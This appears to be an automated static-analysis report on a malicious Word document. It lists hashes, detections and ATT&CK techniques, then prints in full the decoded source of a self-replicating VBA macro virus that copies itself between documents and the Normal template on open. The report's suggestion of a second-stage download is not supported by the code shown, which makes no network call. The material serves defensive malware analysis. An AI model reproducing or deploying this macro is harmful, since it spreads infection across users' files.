Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7158ad359f6748aa…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 32.5 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14

MD5: c21965996241ffb0f09159a4e227ec37
SHA-1: 9f62b19d61948ee97456b28113c14a923a92e6bd
SHA-256: 7158ad359f6748aa87171c7361cc211b5a1a7a6c78a81c2d7e1e2b3101e456d1

Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, a common technique for executing code as soon as a document is opened. The macro accesses the VBA projects of both the Normal template and the active document, and uses CodeModule.Find to check each module for the constant flag ("Çäåñü âèðóñîâ íåò"); whichever module lacks the flag has its contents deleted and replaced with a copy of the other module's code, after which the template or document is saved. The embedded strings (rendered here as mojibake) therefore act as an infection marker rather than as payload data. The presence of a Document_Open macro together with self-copying into the Normal template strongly suggests an attempt to establish persistence or prepare for a second-stage download.

Heuristics (3)

  • ClamAV: Doc.Trojan.Wicked-2 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Wicked-2
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open auto-execution macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename:  macros.bas
Kind:      vba-macro
Source:    oletools.olevba.extract_macros (decoded VBA source)
Size:      1517 bytes
SHA-256:   e3aebe7d94f34a673f12ec33e77a06009cca50fe70db15935ef3b71abb20c9a0

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Const flag = "Çäåñü âèðóñîâ íåò"

Private Sub Document_Open()
Set x1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x2 = NormalTemplate.VBProject.VBComponents.Item(1)

x3 = x1.CodeModule.Find(flag, 1, 1, 10000, 10000)
x4 = x2.CodeModule.Find(flag, 1, 1, 10000, 10000)

If x4 = False Then
    x11 = x1.CodeModule.Lines(1, x1.CodeModule.CountOfLines)
    x2.CodeModule.DeleteLines 1, x2.CodeModule.CountOfLines
    x2.CodeModule.AddFromString x11
    With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "Äîáðûé äîêòîð Àéáîëèò": .Keywords = "": .Comments = "Çëûå âèðóñû çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò": .Execute: End With
    NormalTemplate.Save
End If
If x3 = False Then
    x11 = x2.CodeModule.Lines(1, x2.CodeModule.CountOfLines)
    x1.CodeModule.DeleteLines 1, x1.CodeModule.CountOfLines
    x1.CodeModule.AddFromString x11
    With Dialogs(wdDialogFileSummaryInfo): .Title = "": .Subject = "": .Author = "Äîáðûé äîêòîð Àéáîëèò": .Keywords = "": .Comments = "Çëûå âèðóñû çäåñü áîëüøå íå æèâóò è æèòü íå áóäóò": .Execute: End With
    ActiveDocument.Save
End If

End Sub